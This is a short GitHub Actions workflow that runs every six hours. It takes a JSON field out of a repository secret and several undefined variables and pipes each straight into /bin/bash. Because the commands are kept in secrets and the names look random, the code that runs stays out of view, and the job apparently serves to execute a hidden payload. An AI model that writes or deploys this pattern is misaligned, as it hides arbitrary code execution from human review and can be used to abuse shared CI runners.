name: guoxiuqing2678

on:
  workflow_dispatch:
  schedule:
    - cron: '35 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guoxiuqing2678
        env:
          bsr3: ${{ secrets.bsr3 }}
        run: |
          echo $bsr3 | jq -r .pfjzk46192 | /bin/bash
          echo $pav1908 | jq -r .fouce202 | /bin/bash
          echo $tc532 | jq -r .yqe6308 | /bin/bash
          echo $vbh278 | jq -r .xtl3975 | /bin/bash
          echo $rynf8200 | jq -r .hut21783 | /bin/bash

